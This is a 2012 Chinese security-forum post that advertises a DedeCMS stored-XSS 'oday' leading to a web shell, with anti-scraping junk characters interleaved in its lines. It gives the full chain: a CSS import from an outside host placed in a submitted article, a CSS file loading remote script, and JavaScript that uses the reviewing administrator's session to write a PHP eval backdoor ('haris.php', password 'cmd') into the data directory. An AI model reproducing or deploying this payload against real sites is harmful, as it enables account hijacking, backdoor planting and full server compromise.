找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2107|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
/ j; ^$ Q, |, P为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)5 w0 R% u* T- o* E2 X! Z, I1 m4 B
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。5 U8 U9 ^& q3 q& C6 |& E  p$ f
下面说说利用方法。% s2 y0 F  Y  f% a  |- p
条件有2个:) e, U6 p8 o7 ^
1.开启注册
. I' Z1 X$ _3 Y( ]# p# m7 Y4 g% B2.开启投稿2 {& ~+ @# R/ t1 ?; ^
注册会员----发表文章' f# {2 z+ q$ H  ]
内容填写:0 S% q# p3 _+ h' G& }4 G1 _
复制代码
" z- P- ]6 _& s; l<style>@im\port'\http://xxx.com/xss.css';</style>3 e- A% v0 o# }3 n* w3 ~1 C
新建XSS.Css
3 f/ z. r0 [; r9 S7 ]复制代码9 D( n; F5 a7 ~! j& a. t
.body{7 {6 |- D4 V4 i$ P9 d! m; b
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }& P" z  j" h- g) C' K" W- x
新建xss.js 内容为
; m* [$ v: Q% M/ _! P4 j复制代码
& S8 X4 [& V- _8 P1.var request = false;
2 O7 o- d) h  X  T  u* K. w2.if(window.XMLHttpRequest) {
5 p+ }# h" k; Y1 L, d5 R7 Q3 c3.request = new XMLHttpRequest();( b( S9 u8 R" x. f/ k' G6 F
4.if(request.overrideMimeType) {
1 R4 `  f) b6 w5 ^$ M# x1 O5.request.overrideMimeType('text/xml');3 T& H" u/ ~2 E2 E
6.}1 r5 o. J3 X% U9 B$ a
7.} else if(window.ActiveXObject) {
- l* i6 _2 c7 K8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
9 m9 m) {0 m# H2 w% I# E9.for(var i=0; i<versions.length; i++) {* ~  M# O* R( Q+ d) C
10.try {
& }" a, f* l" u( }6 d11.request = new ActiveXObject(versions);
$ J' ]' N9 m+ w" k' W; t# ~! N2 w12.} catch(e) {}
# j: z' y+ K* I4 v13.}$ J* r( W" B6 \5 V# v' d  D) [# s
14.}9 `8 A, F. N+ y) _9 W1 S; Z; N
15.xmlhttp=request;8 r/ b* ~% e5 C0 J: K0 }
16.function getFolder( url ){
& D/ F9 ^. S9 x2 i17. obj = url.split('/')
6 R$ d& ~/ v2 f/ E  q( j4 r; k18. return obj[obj.length-2]
( r; `, |" l& D, U! o" A( H' v# u19.}+ j' k" q! Z$ r* C
20.oUrl = top.location.href;
! n- ?) [% w% p8 D1 L21.u = getFolder(oUrl);
: j9 E4 C% \; V! |) ?8 d) e22.add_admin();# {1 b1 a5 A$ \! V
23.function add_admin(){+ K# \% i4 }) h9 x) [
24.var url= "/"+u+"/sys_sql_query.php";
5 B* `- w- q0 V$ A" P25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
8 _, ]( K* S- ~( d8 p26.xmlhttp.open("POST", url, true);3 x" O4 g7 n: L( w( a0 `; E& I
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");- g+ b7 @& G6 f. G
28.xmlhttp.setRequestHeader("Content-length", params.length);
2 _9 u8 e; z* K+ d5 G! t: }$ N29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
0 `  F# T, g2 m' E8 E30.xmlhttp.send(params);
+ {" t1 e* s& P31.}
% _! p) V5 K- o) g当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表